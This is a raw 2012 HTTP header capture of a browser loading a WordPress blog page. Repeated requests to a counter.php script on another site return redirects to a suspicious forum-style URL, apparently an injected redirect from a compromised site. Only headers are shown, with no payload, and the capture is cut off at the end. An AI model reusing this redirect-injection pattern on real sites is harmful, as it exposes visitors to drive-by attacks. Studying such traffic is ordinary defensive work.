Etag: &quot;40e5ae4-1e2a-4ca67daf871c0&quot;
Accept-Ranges: bytes
Content-Length: 7722
Keep-Alive: timeout=15, max=97
Connection: Keep-Alive
GET /wp-content/themes/journalcrunch/js/Vegur_400-Vegur_700.font.js HTTP/1.1

Host: www.apistoia.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.apistoia.com/?p=15
HTTP/1.1 200 OK

Content-Type: application/javascript
Date: Fri, 26 Oct 2012 01:52:22 GMT
Server: Apache/2.2
Last-Modified: Mon, 24 Sep 2012 00:41:55 GMT
Etag: &quot;40e585c-0-4ca67db357ac0&quot;
Accept-Ranges: bytes
Content-Length: 0
Keep-Alive: timeout=15, max=99
Connection: Keep-Alive
GET /wp-content/themes/journalcrunch/images/ico_facebook.png HTTP/1.1

Host: www.apistoia.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.apistoia.com/?p=15
HTTP/1.1 404 Not Found

Content-Type: text/html; charset=iso-8859-1
Date: Fri, 26 Oct 2012 01:52:22 GMT
Server: Apache/2.2
Content-Length: 253
Keep-Alive: timeout=15, max=98
Connection: Keep-Alive
GET /wp-content/themes/journalcrunch/images/ico_rss.png HTTP/1.1

Host: www.apistoia.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.apistoia.com/?p=15
HTTP/1.1 404 Not Found

Content-Type: text/html; charset=iso-8859-1
Date: Fri, 26 Oct 2012 01:52:22 GMT
Server: Apache/2.2
Content-Length: 248
Keep-Alive: timeout=15, max=98
Connection: Keep-Alive
GET /wp-content/themes/journalcrunch/images/ico_post_comments.png HTTP/1.1

Host: www.apistoia.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.apistoia.com/?p=15
HTTP/1.1 200 OK

Content-Type: image/png
Date: Fri, 26 Oct 2012 01:52:22 GMT
Server: Apache/2.2
Last-Modified: Fri, 27 Apr 2012 08:47:21 GMT
Etag: &quot;40e5809-191-4bea5270eb840&quot;
Accept-Ranges: bytes
Content-Length: 401
Keep-Alive: timeout=15, max=96
Connection: Keep-Alive
GET /wp-content/themes/journalcrunch/images/ico_post_date.png HTTP/1.1

Host: www.apistoia.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.apistoia.com/?p=15
HTTP/1.1 200 OK

Content-Type: image/png
Date: Fri, 26 Oct 2012 01:52:22 GMT
Server: Apache/2.2
Last-Modified: Fri, 27 Apr 2012 08:47:21 GMT
Etag: &quot;59d99a2-141-4bea5270eb840&quot;
Accept-Ranges: bytes
Content-Length: 321
Keep-Alive: timeout=15, max=98
Connection: Keep-Alive
GET /showthread.php?sid=174143 HTTP/1.1

Host: moreclosings.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.apistoia.com/?p=15
HTTP/1.1 404 Not Found

Content-Type: text/html
Date: Fri, 26 Oct 2012 01:52:23 GMT
Server: Apache
Last-Modified: Fri, 20 Apr 2012 07:29:27 GMT
Accept-Ranges: bytes
Content-Length: 3354
Keep-Alive: timeout=5, max=75
Connection: Keep-Alive
GET /wp-content/uploads/2012/05/header_1.jpg HTTP/1.1

Host: www.apistoia.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.apistoia.com/?p=15
HTTP/1.1 200 OK

Content-Type: image/jpeg
Date: Fri, 26 Oct 2012 01:52:22 GMT
Server: Apache/2.2
Last-Modified: Sun, 13 May 2012 21:45:31 GMT
Etag: &quot;d441be-a001-4bff1e37594c0&quot;
Accept-Ranges: bytes
Content-Length: 40961
Keep-Alive: timeout=15, max=97
Connection: Keep-Alive
GET /wp-content/themes/journalcrunch/images/bk_body.jpg HTTP/1.1

Host: www.apistoia.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.apistoia.com/wp-content/themes/journalcrunch/style.css
HTTP/1.1 200 OK

Content-Type: image/jpeg
Date: Fri, 26 Oct 2012 01:52:22 GMT
Server: Apache/2.2
Last-Modified: Fri, 27 Apr 2012 08:47:20 GMT
Etag: &quot;59231d0-bda-4bea526ff7600&quot;
Accept-Ranges: bytes
Content-Length: 3034
Keep-Alive: timeout=15, max=97
Connection: Keep-Alive
GET /wp-content/themes/journalcrunch/js/jquery-1.4.2.min.js HTTP/1.1

Host: www.apistoia.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.apistoia.com/?p=15
HTTP/1.1 200 OK

Content-Type: application/javascript
Date: Fri, 26 Oct 2012 01:52:22 GMT
Server: Apache/2.2
Last-Modified: Mon, 24 Sep 2012 00:41:16 GMT
Etag: &quot;40e5ac4-11cb1-4ca67d8e26300&quot;
Accept-Ranges: bytes
Content-Length: 72881
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
GET /dam/counter.php HTTP/1.1

Host: www.grupporagni.it

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.apistoia.com/?p=15
HTTP/1.1 302 Found

Content-Type: text/html; charset=iso-8859-1
Date: Fri, 26 Oct 2012 01:52:23 GMT
Server: Apache/2.2
Location: http://moreclosings.com/showthread.php?sid=174143
Content-Length: 233
Keep-Alive: timeout=15, max=99
Connection: Keep-Alive
GET /images/x.png HTTP/1.1

Host: 74.53.143.237

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://moreclosings.com/showthread.php?sid=174143
HTTP/1.1 200 OK

Content-Type: image/png
Date: Fri, 26 Oct 2012 01:52:24 GMT
Server: Apache/2.2.15 (CentOS)
Last-Modified: Mon, 12 Jul 2010 18:56:30 GMT
Etag: &quot;e3899de-a70-48b354f7d9380&quot;
Accept-Ranges: bytes
Content-Length: 2672
Connection: close
GET /images/404bottom.gif HTTP/1.1

Host: 74.53.143.237

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://moreclosings.com/showthread.php?sid=174143
HTTP/1.1 200 OK

Content-Type: image/gif
Date: Fri, 26 Oct 2012 01:52:24 GMT
Server: Apache/2.2.15 (CentOS)
Last-Modified: Mon, 12 Jul 2010 18:56:30 GMT
Etag: &quot;e3899d8-219-48b354f7d9380&quot;
Accept-Ranges: bytes
Content-Length: 537
Connection: close
GET /images/404mid.gif HTTP/1.1

Host: 74.53.143.237

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://moreclosings.com/showthread.php?sid=174143
HTTP/1.1 200 OK

Content-Type: image/gif
Date: Fri, 26 Oct 2012 01:52:24 GMT
Server: Apache/2.2.15 (CentOS)
Last-Modified: Mon, 12 Jul 2010 18:56:30 GMT
Etag: &quot;e3899dc-78-48b354f7d9380&quot;
Accept-Ranges: bytes
Content-Length: 120
Connection: close
GET /images/gatorbottom.png HTTP/1.1

Host: 74.53.143.237

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://moreclosings.com/showthread.php?sid=174143
HTTP/1.1 200 OK

Content-Type: image/png
Date: Fri, 26 Oct 2012 01:52:24 GMT
Server: Apache/2.2.15 (CentOS)
Last-Modified: Wed, 11 May 2011 20:45:00 GMT
Etag: &quot;e3899df-1bae-4a306256eeb00&quot;
Accept-Ranges: bytes
Content-Length: 7086
Connection: close
GET /images/404top.gif HTTP/1.1

Host: 74.53.143.237

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://moreclosings.com/showthread.php?sid=174143
HTTP/1.1 200 OK

Content-Type: image/gif
Date: Fri, 26 Oct 2012 01:52:24 GMT
Server: Apache/2.2.15 (CentOS)
Last-Modified: Mon, 12 Jul 2010 18:56:30 GMT
Etag: &quot;e3899dd-5299-48b354f7d9380&quot;
Accept-Ranges: bytes
Content-Length: 21145
Connection: close
GET /wp-content/themes/journalcrunch/images/ico_facebook.png HTTP/1.1

Host: www.apistoia.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.apistoia.com/?p=15
HTTP/1.1 404 Not Found

Content-Type: text/html; charset=iso-8859-1
Date: Fri, 26 Oct 2012 01:52:23 GMT
Server: Apache/2.2
Content-Length: 253
Keep-Alive: timeout=15, max=97
Connection: Keep-Alive
GET /wp-content/themes/journalcrunch/images/ico_rss.png HTTP/1.1

Host: www.apistoia.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.apistoia.com/?p=15
HTTP/1.1 404 Not Found

Content-Type: text/html; charset=iso-8859-1
Date: Fri, 26 Oct 2012 01:52:23 GMT
Server: Apache/2.2
Content-Length: 248
Keep-Alive: timeout=15, max=95
Connection: Keep-Alive
GET /wp-content/themes/journalcrunch/images/bk_main_wrapper.png HTTP/1.1

Host: www.apistoia.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.apistoia.com/wp-content/themes/journalcrunch/style.css
HTTP/1.1 200 OK

Content-Type: image/png
Date: Fri, 26 Oct 2012 01:52:23 GMT
Server: Apache/2.2
Last-Modified: Fri, 27 Apr 2012 08:47:20 GMT
Etag: &quot;40e5a97-16f-4bea526ff7600&quot;
Accept-Ranges: bytes
Content-Length: 367
Keep-Alive: timeout=15, max=97
Connection: Keep-Alive
GET /wp-content/themes/journalcrunch/images/ico_search.png HTTP/1.1

Host: www.apistoia.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.apistoia.com/wp-content/themes/journalcrunch/style.css
HTTP/1.1 200 OK

Content-Type: image/png
Date: Fri, 26 Oct 2012 01:52:24 GMT
Server: Apache/2.2
Last-Modified: Fri, 27 Apr 2012 08:47:21 GMT
Etag: &quot;59d9e6d-204-4bea5270eb840&quot;
Accept-Ranges: bytes
Content-Length: 516
Keep-Alive: timeout=15, max=96
Connection: Keep-Alive
GET /wp-content/themes/journalcrunch/images/ico_social_facebook.png HTTP/1.1

Host: www.apistoia.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.apistoia.com/wp-content/themes/journalcrunch/style.css
HTTP/1.1 200 OK

Content-Type: image/png
Date: Fri, 26 Oct 2012 01:52:24 GMT
Server: Apache/2.2
Last-Modified: Fri, 27 Apr 2012 08:47:21 GMT
Etag: &quot;40e5aa7-9c2-4bea5270eb840&quot;
Accept-Ranges: bytes
Content-Length: 2498
Keep-Alive: timeout=15, max=96
Connection: Keep-Alive
GET /wp-content/themes/journalcrunch/images/ico_social_rss.png HTTP/1.1

Host: www.apistoia.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.apistoia.com/wp-content/themes/journalcrunch/style.css
HTTP/1.1 200 OK

Content-Type: image/png
Date: Fri, 26 Oct 2012 01:52:24 GMT
Server: Apache/2.2
Last-Modified: Fri, 27 Apr 2012 08:47:22 GMT
Etag: &quot;5923470-de2-4bea5271dfa80&quot;
Accept-Ranges: bytes
Content-Length: 3554
Keep-Alive: timeout=15, max=99
Connection: Keep-Alive
GET /avatar/a559cbfe2de02d814eab48115ecbe10e?s=38&d=http%3A%2F%2F0.gravatar.com%2Favatar%2Fad516503a11cd5ca435acc9bb6523536%3Fs%3D38&r=G HTTP/1.1

Host: 0.gravatar.com
GET /avatar/a559cbfe2de02d814eab48115ecbe10e?s=38&amp;d=http%3A%2F%2F0.gravatar.com%2Favatar%2Fad516503a11cd5ca435acc9bb6523536%3Fs%3D38&amp;r=G HTTP/1.1

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.apistoia.com/?p=15
HTTP/1.1 302 Found

Content-Type: text/html; charset=utf-8
Accept-Ranges: bytes
Cache-Control: max-age=300
Date: Fri, 26 Oct 2012 01:52:24 GMT
Expires: Fri, 26 Oct 2012 01:57:24 GMT
Last-Modified: Wed, 11 Jan 1984 08:00:00 GMT
Location: http://0.gravatar.com/avatar/ad516503a11cd5ca435acc9bb6523536?s=38
Server: ECS (arn/46E2)
Source-Age: 0
Via: 1.1 varnish
X-Cache: 302-HIT
X-Varnish: 2680536729
Content-Length: 0
GET /wp-content/themes/journalcrunch/images/bk_vertline.jpg HTTP/1.1

Host: www.apistoia.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.apistoia.com/wp-content/themes/journalcrunch/style.css
HTTP/1.1 404 Not Found

Content-Type: text/html; charset=iso-8859-1
Date: Fri, 26 Oct 2012 01:52:24 GMT
Server: Apache/2.2
Content-Length: 252
Keep-Alive: timeout=15, max=96
Connection: Keep-Alive
GET /wp-content/themes/journalcrunch/images/bk_dotted_big.png HTTP/1.1

Host: www.apistoia.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.apistoia.com/wp-content/themes/journalcrunch/style.css
HTTP/1.1 200 OK

Content-Type: image/png
Date: Fri, 26 Oct 2012 01:52:24 GMT
Server: Apache/2.2
Last-Modified: Fri, 27 Apr 2012 08:47:20 GMT
Etag: &quot;59233c2-ea-4bea526ff7600&quot;
Accept-Ranges: bytes
Content-Length: 234
Keep-Alive: timeout=15, max=94
Connection: Keep-Alive
GET /wp-content/themes/journalcrunch/images/box_botttom_shadow_right.png HTTP/1.1

Host: www.apistoia.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.apistoia.com/wp-content/themes/journalcrunch/style.css
HTTP/1.1 200 OK

Content-Type: image/png
Date: Fri, 26 Oct 2012 01:52:24 GMT
Server: Apache/2.2
Last-Modified: Fri, 27 Apr 2012 08:47:20 GMT
Etag: &quot;40e5804-1a4-4bea526ff7600&quot;
Accept-Ranges: bytes
Content-Length: 420
Keep-Alive: timeout=15, max=98
Connection: Keep-Alive
GET /wp-content/themes/journalcrunch/images/but_form.png HTTP/1.1

Host: www.apistoia.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.apistoia.com/wp-content/themes/journalcrunch/style.css
HTTP/1.1 200 OK

Content-Type: image/png
Date: Fri, 26 Oct 2012 01:52:24 GMT
Server: Apache/2.2
Last-Modified: Fri, 27 Apr 2012 08:47:21 GMT
Etag: &quot;40e5aa2-6ed-4bea5270eb840&quot;
Accept-Ranges: bytes
Content-Length: 1773
Keep-Alive: timeout=15, max=95
Connection: Keep-Alive
GET /wp-content/themes/journalcrunch/images/ico_comments.png HTTP/1.1

Host: www.apistoia.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.apistoia.com/wp-content/themes/journalcrunch/style.css
HTTP/1.1 200 OK

Content-Type: image/png
Date: Fri, 26 Oct 2012 01:52:24 GMT
Server: Apache/2.2
Last-Modified: Fri, 27 Apr 2012 08:47:21 GMT
Etag: &quot;40e54a7-3d8-4bea5270eb840&quot;
Accept-Ranges: bytes
Content-Length: 984
Keep-Alive: timeout=15, max=95
Connection: Keep-Alive
GET /wp-content/themes/journalcrunch/images/ico_tag.png HTTP/1.1

Host: www.apistoia.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.apistoia.com/wp-content/themes/journalcrunch/style.css
HTTP/1.1 200 OK

Content-Type: image/png
Date: Fri, 26 Oct 2012 01:52:24 GMT
Server: Apache/2.2
Last-Modified: Fri, 27 Apr 2012 08:47:22 GMT
Etag: &quot;40e581b-d18-4bea5271dfa80&quot;
Accept-Ranges: bytes
Content-Length: 3352
Keep-Alive: timeout=15, max=96
Connection: Keep-Alive
GET /avatar/ad516503a11cd5ca435acc9bb6523536?s=38 HTTP/1.1

Host: 0.gravatar.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.apistoia.com/?p=15
HTTP/1.1 200 OK

Content-Type: image/png
Accept-Ranges: bytes
Access-Control-Allow-Origin: *
Cache-Control: max-age=300
Content-Disposition: inline; filename=&quot;ad516503a11cd5ca435acc9bb6523536.png&quot;
Date: Fri, 26 Oct 2012 01:52:24 GMT
Expires: Fri, 26 Oct 2012 01:57:24 GMT
Last-Modified: Sat, 01 Mar 2008 02:44:06 GMT
Server: ECS (arn/46E6)
Source-Age: 1611
Via: 1.1 varnish
X-Cache: HIT
X-Varnish: 4030352740 4029230654
Content-Length: 903
GET /showthread.php?sid=174143 HTTP/1.1

Host: moreclosings.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.apistoia.com/?p=15
If-Modified-Since: Fri, 20 Apr 2012 07:29:27 GMT
HTTP/1.1 404 Not Found

Content-Type: text/html
Date: Fri, 26 Oct 2012 01:52:24 GMT
Server: Apache
Last-Modified: Fri, 20 Apr 2012 07:29:27 GMT
Accept-Ranges: bytes
Content-Length: 3354
Keep-Alive: timeout=5, max=74
Connection: Keep-Alive
GET /avatar/b71f5b59f71027f8f5a5088b02db98d0?s=38&d=http%3A%2F%2F1.gravatar.com%2Favatar%2Fad516503a11cd5ca435acc9bb6523536%3Fs%3D38&r=G HTTP/1.1

Host: 1.gravatar.com
GET /avatar/b71f5b59f71027f8f5a5088b02db98d0?s=38&amp;d=http%3A%2F%2F1.gravatar.com%2Favatar%2Fad516503a11cd5ca435acc9bb6523536%3Fs%3D38&amp;r=G HTTP/1.1

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.apistoia.com/?p=15
HTTP/1.1 302 Found

Content-Type: text/html; charset=utf-8
Cache-Control: max-age=300
Date: Fri, 26 Oct 2012 01:52:24 GMT
Expires: Fri, 26 Oct 2012 01:57:24 GMT
Last-Modified: Wed, 11 Jan 1984 08:00:00 GMT
Location: http://1.gravatar.com/avatar/ad516503a11cd5ca435acc9bb6523536?s=38
Server: nginx
Source-Age: 0
Via: 1.1 varnish
X-Varnish: 1398804268
Content-Length: 0
GET /dam/counter.php HTTP/1.1

Host: www.grupporagni.it

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.apistoia.com/?p=15
HTTP/1.1 302 Found

Content-Type: text/html; charset=iso-8859-1
Date: Fri, 26 Oct 2012 01:52:24 GMT
Server: Apache/2.2
Location: http://moreclosings.com/showthread.php?sid=174143
Content-Length: 233
Keep-Alive: timeout=15, max=98
Connection: Keep-Alive
GET /avatar/ad516503a11cd5ca435acc9bb6523536?s=38 HTTP/1.1

Host: 1.gravatar.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.apistoia.com/?p=15
HTTP/1.1 200 OK

Content-Type: image/png
Accept-Ranges: bytes
Access-Control-Allow-Origin: *
Cache-Control: max-age=300
Content-Disposition: inline; filename=&quot;ad516503a11cd5ca435acc9bb6523536.png&quot;
Date: Fri, 26 Oct 2012 01:52:24 GMT
Expires: Fri, 26 Oct 2012 01:57:24 GMT
Last-Modified: Sat, 01 Mar 2008 02:44:06 GMT
Server: ECS (arn/46E6)
Source-Age: 1611
Via: 1.1 varnish
X-Cache: HIT
X-Varnish: 4030352740 4029230654
Content-Length: 903
GET /dam/counter.php HTTP/1.1

Host: www.grupporagni.it

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.apistoia.com/?p=15
HTTP/1.1 302 Found

Content-Type: text/html; charset=iso-8859-1
Date: Fri, 26 Oct 2012 01:52:24 GMT
